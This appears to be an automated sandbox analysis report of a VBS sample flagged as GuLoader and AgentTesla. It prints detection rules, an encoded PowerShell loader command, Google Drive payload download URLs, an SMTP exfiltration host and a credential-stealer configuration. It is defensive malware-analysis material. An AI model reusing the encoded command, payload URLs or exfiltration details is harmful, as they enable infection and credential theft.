Source	Rule	Description	Author	Strings
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x167de:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x16862:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x4886:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8a16:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x1984c:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41 0x20304:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x9066:$xc3: 4A 41 42 70 41 44 30 41
0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x70d0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0xf33d:$xc3: 4A 41 42 70 41 44 30 41 0x23d0e:$xc3: 4A 41 42 70 41 44 30 41 0x2db56:$xc3: 4A 41 42 70 41 44 30 41 0xaa8e:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x66:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8ba0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x66:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8b14:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
Process Memory Space: powershell.exe PID: 9092	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0xed8a7:$xc3: 4A 41 42 70 41 44 30 41 0xf1568:$xc3: 4A 41 42 70 41 44 30 41 0xf4b08:$xc3: 4A 41 42 70 41 44 30 41 0x103377:$xc3: 4A 41 42 70 41 44 30 41 0x10956c:$xc3: 4A 41 42 70 41 44 30 41 0x10cac1:$xc3: 4A 41 42 70 41 44 30 41 0x14682c:$xc3: 4A 41 42 70 41 44 30 41 0x149dcc:$xc3: 4A 41 42 70 41 44 30 41 0x16d205:$xc3: 4A 41 42 70 41 44 30 41 0x199a9c:$xc3: 4A 41 42 70 41 44 30 41 0x19d736:$xc3: 4A 41 42 70 41 44 30 41 0x1a0cde:$xc3: 4A 41 42 70 41 44 30 41 0x1a61e4:$xc3: 4A 41 42 70 41 44 30 41 0x1a9784:$xc3: 4A 41 42 70 41 44 30 41 0x1ad828:$xc3: 4A 41 42 70 41 44 30 41 0x1b0dc8:$xc3: 4A 41 42 70 41 44 30 41 0x220d9c:$xc3: 4A 41 42 70 41 44 30 41 0x24c144:$xc3: 4A 41 42 70 41 44 30 41 0x24c3fb:$xc3: 4A 41 42 70 41 44 30 41 0x268a2a:$xc3: 4A 41 42 70 41 44 30 41 0x26a838:$xc3: 4A 41 42 70 41 44 30 41
Process Memory Space: CasPol.exe PID: 6564	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x45aff:$xc3: 4A 41 42 70 41 44 30 41
Process Memory Space: CasPol.exe PID: 6564	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 6564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 15 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAg

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PUMP mt310143121.vbs

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

Avira URL Cloud: Label: malware

Source: CasPol.exe.6376.25.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "COCO_.zipCookieapplication/zip-f \\Data\\Tor\\torrcp=127.0.0.1POST+%2Bapplication/x-www-form-urlencoded"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C286B0 CryptUnprotectData,		26_2_20C286B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C286AB CryptUnprotectData,		26_2_20C286AB

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 216.218.206.36 216.218.206.36

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587

Source: global traffic

TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587

Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2266408532.0000000021054000.00000004.00000800.00020000.00000000.sdmp, Cookies.26.dr	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.26.dr	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://AzAPmg.com
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072070066.0000000001507000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.prgisi.com
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5766354780.000000001DCAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a1BgY4r4bA.com
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a1BgY4r4bA.comt-
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%mail.prgisi.comjcvaleroso
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: CasPol.exe, 0000001A.00000003.2072435740.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5716278615.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072883437.0000000001531000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5727289842.0000000001531000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6h
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCb
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCt
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Wscript starts Powershell (via cmd or directly)

